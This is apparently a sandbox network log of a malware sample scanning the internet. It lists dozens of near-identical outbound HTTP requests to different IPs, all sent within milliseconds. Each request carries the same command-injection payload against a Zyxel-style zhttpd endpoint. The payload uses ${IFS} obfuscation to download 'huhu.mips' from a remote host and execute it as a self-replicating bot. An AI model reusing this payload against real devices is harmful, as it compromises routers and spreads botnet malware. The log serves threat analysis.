                                                  Jan 19, 2024 18:24:01.165751934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5638192.168.2.134171060.82.187.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165797949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5639192.168.2.1350912142.242.103.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165844917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5640192.168.2.1346262124.174.48.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165895939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5641192.168.2.136067274.202.168.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165925026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5642192.168.2.1356816183.157.119.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165988922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5643192.168.2.1340856168.66.93.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166021109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5644192.168.2.1351960159.200.18.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166059017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5645192.168.2.1337580140.82.162.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166101933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5646192.168.2.1353702152.124.16.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166165113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5647192.168.2.135181012.126.255.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166182041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5648192.168.2.134830886.97.199.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166208029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5649192.168.2.13481562.35.61.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166244030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5650192.168.2.1338162208.65.77.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166271925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5651192.168.2.135783063.132.84.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166322947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5652192.168.2.1336540196.231.134.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166346073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5653192.168.2.136077638.11.173.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166387081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5654192.168.2.134783280.243.63.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166398048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5655192.168.2.135950420.63.149.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166416883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5656192.168.2.1342982108.27.13.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166486025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5657192.168.2.134952260.191.132.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166517019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5658192.168.2.1339448104.215.85.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166583061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5659192.168.2.1349548176.111.140.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166631937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5660192.168.2.13465724.235.228.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166651011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5661192.168.2.134248882.131.81.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166701078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5662192.168.2.135789679.97.67.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166739941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5663192.168.2.1354390162.105.38.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166770935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5664192.168.2.135951249.126.27.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166874886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5665192.168.2.134892471.242.234.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166910887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5666192.168.2.1333084103.108.170.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166955948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5667192.168.2.134686025.9.149.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.166987896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5668192.168.2.135476249.223.102.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167016029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5669192.168.2.134062045.199.21.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167033911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5670192.168.2.1355648154.115.32.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167082071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5671192.168.2.1352218107.62.179.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167118073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5672192.168.2.1334026202.43.172.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167145967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5673192.168.2.1349906183.55.13.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167205095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5674192.168.2.1347024184.94.40.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167239904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5675192.168.2.1350230141.201.58.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167293072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5676192.168.2.135120050.234.190.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167325974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5677192.168.2.1345508143.117.202.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167362928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5678192.168.2.1350776191.211.20.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167438984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5679192.168.2.1350220177.155.5.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167465925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5680192.168.2.1339116151.202.56.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167524099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5681192.168.2.135320896.72.119.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167553902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5682192.168.2.1335102117.228.213.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167608976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5683192.168.2.133529027.243.250.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167656898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5684192.168.2.135147879.198.127.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167685032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5685192.168.2.1340252141.228.192.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167712927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5686192.168.2.1343922194.48.118.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167757988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5687192.168.2.1345046206.125.10.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167805910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5688192.168.2.1352304168.89.216.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167826891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5689192.168.2.1345988178.126.15.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167849064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5690192.168.2.1358190141.141.165.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167912960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5691192.168.2.1359012187.253.174.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167954922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5692192.168.2.1349216122.133.160.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.167994976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5693192.168.2.134254052.184.38.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168031931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5694192.168.2.1353336167.92.77.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168061018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5695192.168.2.1350114114.162.66.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168096066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5696192.168.2.134689643.137.79.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168143034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5697192.168.2.1336752142.136.161.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168170929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5698192.168.2.1348844216.91.222.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168194056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5699192.168.2.1355624145.114.30.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168242931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5700192.168.2.1359110174.220.157.177443
                                                  TimestampBytes transferredDirectionData
